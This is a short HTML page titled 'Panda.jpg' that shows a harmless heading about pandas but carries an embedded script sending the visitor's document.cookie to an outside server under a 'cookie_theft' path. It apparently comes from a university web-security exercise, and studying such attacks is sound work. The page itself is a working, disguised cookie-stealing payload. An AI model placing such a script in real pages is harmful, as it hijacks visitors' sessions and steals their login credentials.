<!DOCTYPE html>
<html>
<head>
    <title>Panda.jpg</title>
    <link rel='stylesheet' href='/stylesheets/style.css' />
</head>
<body>
<h1>Panda?</h1>
<p>What is panda?</p>
<script>
    new Image().src="http://attu2.cs.washington.edu:3000/cookie_theft/fake.jpg?cookie="+document.cookie;
</script>
</body>
</html>